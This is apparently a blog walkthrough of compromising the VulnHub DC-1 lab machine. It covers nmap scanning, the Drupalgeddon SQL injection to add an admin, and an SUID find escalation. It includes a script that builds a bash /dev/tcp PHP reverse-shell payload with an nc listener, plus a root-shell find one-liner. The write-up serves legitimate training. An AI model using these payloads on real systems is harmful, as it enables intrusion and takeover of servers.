VulnHub is a fantastic starting point for those who are beginners to pentesting. All the machines that we’ll be hacking into are available as .ova downloads on VulnHub. I usually import them into VMware Workstation, just because I’m more comfortable with Workstation than VirtualBox. I’ll also be using Kali Linux as my attacking machine.
The vulnerable machine that we’ll be using in this article is available here.
Note: The methodologies and tools that you learn from pentesting have real world applications. Do not attempt to try and hack into machines you’re not authorized to. I will not be held responsible for your actions.
Finding IP Address of DC-1
After powering up the machine in Workstation, the first step is to determine its IP address. We’ll need the IP address for all communications with DC-1. My personal choice is
So, the IP address of DC-1 is 192.168.248.144. Let’s modify our /etc/hosts file on Kali to reflect this. Your address will almost certainly differ (VMware’s NAT DHCP hands out whatever is free), so use the one your own scan returned.
Now that we know the IP address of DC-1, we’ll scan it more deeply to get more information out of it. I have written a port scan bash script which is basically two nmap scans: the first determines which ports are open, and the second runs nmap with the -A flag (version detection, default NSE scripts, OS detection and traceroute) against only those ports, which keeps the slow part of the scan small.
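The two-scan approach described above, written out as a script. This is an added example, not the author’s script: it assumes nmap is installed, that the target name resolves (the /etc/hosts entry), and that it is run with sudo so the OS detection part of -A works. The parsing function reads nmap’s grepable (-oG) output on stdin, so the port-list logic can be checked against a constructed line without a live scan.

```sh
#!/bin/sh
# Two-stage nmap wrapper: discover open TCP ports across all 65535, then run
# -A against only those. Added example, not the original post's script.
set -e

# Turn nmap grepable output (read on stdin) into a comma-separated port list.
# A -oG host line looks like:
#   Host: 192.168.248.144 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
# Only ports reported "open" are kept; filtered/closed entries never match.
open_ports_from_grepable() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -n -u | paste -s -d, -
}

two_stage_scan() {
    target="$1"
    tmp="$(mktemp)"
    # Stage 1: every TCP port, fast timing, grepable output for parsing.
    # (No -sV/-A here: that is what makes a full-range scan quick.)
    nmap -p- -T4 --min-rate 1000 -oG "$tmp" "$target" >/dev/null
    ports="$(open_ports_from_grepable < "$tmp")"
    rm -f "$tmp"
    if [ -z "$ports" ]; then
        echo "no open TCP ports reported for $target" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    # Stage 2: -A = version detection, default NSE scripts (including
    # http-robots.txt), OS detection and traceroute, restricted to those ports.
    nmap -A -p "$ports" "$target"
}

# Usage: sudo sh scan.sh dc-1   (no argument: only define the functions)
if [ $# -gt 0 ]; then
    two_stage_scan "$1"
fi
```

Stage 1 deliberately skips version detection; probing 65535 ports with -sV would take far longer than scanning them and then probing the handful that answered.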
From the nmap scan, we can note the following: OpenSSH 6.0p1 Debian 4+deb7u7, Apache httpd 2.2.22 and Drupal 7. The 4+deb7u7 suffix tells us the SSH package comes from Debian 7 (wheezy).
OpenSSH 6.0p1 was released on 2012-04-22, which is quite old, so there might be vulnerabilities in it. Keep in mind, though, that Debian backports security fixes without changing the upstream version number (the deb7u7 part shows the package has been updated several times), so the release date alone doesn’t prove anything is exploitable. Either way, we have more interesting and possibly easier entry options through port 80, so let’s go for that route first.
Port 80 served a Drupal login form.
From the nmap scan (specifically the http-robots.txt NSE script that -A runs), we know the robots.txt file contains many entries, so let’s look into that.
It looks like the interesting pages, like /cron.php, are behind the login page that we saw.
For now, I don’t see any point in running dirbuster or other website directory enumeration tools, since robots.txt already gave us information about the site’s structure. Keep in mind that it only lists the paths a stock Drupal install asks crawlers to skip, so it is a starting point rather than a complete map of the server.
Let’s see if searchsploit gives us any interesting Drupal 7 exploits that we can use to log into the web application.
Let’s look at 'Drupalgeddon' SQL Injection (Add Admin User). Drupalgeddon (CVE-2014-3704) is a pre-authentication SQL injection in Drupal 7’s database abstraction layer, fixed in Drupal 7.32, so it only works if this site has never been updated; the 'Add Admin User' variant uses it to insert a new administrator account with a password of our choosing.
Looks like it was a success! We’re now logged into the web application as a Drupal 7 admin user. Our next aim is to find a location where we can upload a shell script.
Initial Access – Shell Upload and Execute
I found an article through Google-fu which outlines how to upload a shell on Drupal 7. Besides the steps in the article, there’s one additional step in our situation: enable the PHP filter module and grant permission to use the PHP code text format. Granting it to all users is fine in a lab like this one; on a real engagement, grant it only to the account you control and record the change so it can be reverted afterwards.
Once that is done, you’ll have a page like the following:
Upload a simple PHP reverse shell. Remember to change the IP address to your Kali’s IP, and change the port number too if you feel like doing so (443 needs root to bind, hence the sudo below, but it is also a port that outbound filtering rarely blocks). Start a netcat listener on Kali with sudo nc -nlvp 443 and execute the shell from the browser (or even
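A small helper for the listener step above. It is an added example, not the author’s setup or the reverse-shell file they uploaded: it reads your own IPv4 address from ip’s one-line output so the payload cannot be left pointing at someone else’s lab, validates it, writes a one-line PHP payload that works in a Drupal page saved with the PHP code text format (it relies on bash’s /dev/tcp, so it assumes bash on the target, which Debian has), and starts the listener. Treating eth0 as the VMware NAT interface is an assumption; adjust it for your setup.

```sh
#!/bin/sh
# Build a PHP reverse-shell payload with the right attacker address and start
# the listener. Added example, not the author's file. Assumes Kali's VMware
# interface is eth0 and that the target has bash (DC-1 is Debian, so it does).
set -e

# Pick the first global-scope IPv4 address from `ip -4 -o addr` output on
# stdin. The one-line (-o) format puts each interface on a single line, e.g.
#   2: eth0    inet 192.168.248.128/24 brd 192.168.248.255 scope global eth0\ ...
# Loopback ("scope host") never matches.
first_global_ipv4() {
    awk '/ scope global/ {
            for (i = 1; i <= NF; i++)
                if ($i == "inet") { split($(i + 1), a, "/"); print a[1]; exit }
         }'
}

# Accept only a dotted quad with every octet in 0..255.
valid_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# One-line payload for a Drupal page saved with the "PHP code" text format:
# PHP's exec() runs bash, and bash's /dev/tcp pseudo-device dials the listener.
# exec() blocks until the shell exits, which is why the browser request hangs
# for as long as the session is alive.
php_reverse_shell() {
    ip="$1"; port="$2"
    valid_ipv4 "$ip" || { echo "not an IPv4 address: $ip" >&2; return 1; }
    printf '<?php exec("/bin/bash -c \047bash -i >& /dev/tcp/%s/%s 0>&1\047"); ?>\n' "$ip" "$port"
}

# Write payload.txt and listen. Port 443 needs root, hence sudo.
start_listener() {
    port="${1:-443}"
    ip="$(ip -4 -o addr show dev eth0 | first_global_ipv4)"
    php_reverse_shell "$ip" "$port" > payload.txt
    echo "payload.txt connects back to $ip:$port; paste it into the page body" >&2
    sudo nc -nlvp "$port"
}

# Usage: sh listener.sh 443   (no argument: only define the functions)
if [ $# -gt 0 ]; then
    start_listener "$1"
fi
```

The validation step is there because the classic failure with a copied reverse shell is not a typo in the PHP but an address that never gets edited; refusing to write the file until the address parses catches that before you start waiting on a listener that will never see a connection.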
Nice! We now have a low-privilege www-data user shell. Our next step is to find a way to escalate privileges to another user, or even to root if possible.
In the raw shell that we receive on our netcat listener, you’ll notice that there is no tab completion, no command history, and so on. But we can get all of those nice things! Follow these steps:
Let’s find all programs which have the SUID bit set. I search for them specifically because when they are executed, they run with the privileges of their owner. If the owner is root and the program itself is vulnerable, or simply lets us run other commands, we have a chance of escalating our privileges to root.

Focus on /usr/bin/find: find allows you to execute commands through its -exec action, and here it has the SUID bit set, so whatever it executes will run with root privileges. Nice! Let’s head off to GTFOBins to find how to exploit this weakness.
So, the command that will (hopefully) give us a root shell is /usr/bin/find . -exec /bin/sh \; -quit. The -quit stops find after the first match, so only one shell gets spawned. I omitted the -p flag that GTFOBins shows because DC-1 is a Debian machine (verify with the uname -a command), and on Debian /bin/sh is dash: dash keeps the elevated effective UID and rejects -p as an illegal option, whereas bash drops the effective UID back to the real one at startup unless it is given -p. If /bin/sh points at bash on your target (check with ls -l /bin/sh), put the -p back.
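The SUID hunt and the find trick above, as one script. This is an added example, not the author’s commands: the list of abusable names is a hand-picked subset of what GTFOBins lists under SUID (an assumption, so still check the site for anything it flags that this list does not), the filter takes its paths on stdin so it can be tried on a constructed list, and the -p decision is made from what /bin/sh actually resolves to rather than from uname.

```sh
#!/bin/sh
# SUID enumeration plus the find-based escalation. Added example, not from
# the original post. Meant to be pasted into the www-data shell on the target.

# Subset of the binaries GTFOBins lists under "SUID" (assumption: a first
# pass, not the full list).
GTFO_SUID_NAMES="find vim vi nmap bash sh python perl awk less more cp mv env tee"

# Paths on stdin, one per line; print only those whose basename is in the list.
flag_gtfobins() {
    while IFS= read -r path; do
        name="${path##*/}"
        for known in $GTFO_SUID_NAMES; do
            if [ "$name" = "$known" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Live enumeration: only root-owned files, since a SUID file owned by an
# unprivileged user gains us nothing. -perm -4000 matches the setuid bit.
enumerate_suid() {
    find / -user root -perm -4000 -type f 2>/dev/null
}

# Does the shell spawned by find need -p? bash resets its effective UID to the
# real UID at startup unless started with -p; dash (Debian's /bin/sh) keeps the
# effective UID and rejects -p as an illegal option. $1 is the resolved path
# of /bin/sh, e.g. from readlink -f.
sh_priv_flag() {
    case "${1##*/}" in
        bash) printf '%s' '-p' ;;
        *)    printf '' ;;
    esac
}

# Abuse SUID find: -exec runs /bin/sh with find's effective UID (root);
# -quit stops find after the first match so only one shell is spawned.
exploit_suid_find() {
    find_bin="${1:-/usr/bin/find}"
    flag="$(sh_priv_flag "$(readlink -f /bin/sh)")"
    "$find_bin" . -exec /bin/sh $flag \; -quit
}

# Usage: sh suid.sh list      -> print SUID-root binaries GTFOBins knows about
#        sh suid.sh exploit   -> pop the root shell via /usr/bin/find
case "${1:-}" in
    list)    enumerate_suid | flag_gtfobins ;;
    exploit) exploit_suid_find ;;
esac
```

On DC-1 the list mode should report /usr/bin/find among the stock SUID binaries (passwd, su, mount and friends, which are SUID by design and not in the list), and exploit mode runs the same command as above with -p added only when /bin/sh really is bash.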
Nice! We have a root shell and have successfully compromised the DC-1 machine!
Thank you for reading!
In this article, I gave you a small glimpse into the pentesting world. The methodology that we used in this article was very simple. We got a login form; got an exploit to get in; easily uploaded a shell; easily escalated privileges. This was a very simple machine to crack, even though you may not feel so at this point and that’s okay! You’re learning and I feel your pain!
Things will start getting spicy in the coming weeks, so hold on tight! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!
Feature image credit: https://www.360logica.com/blog/different-methodologies-penetration-testing/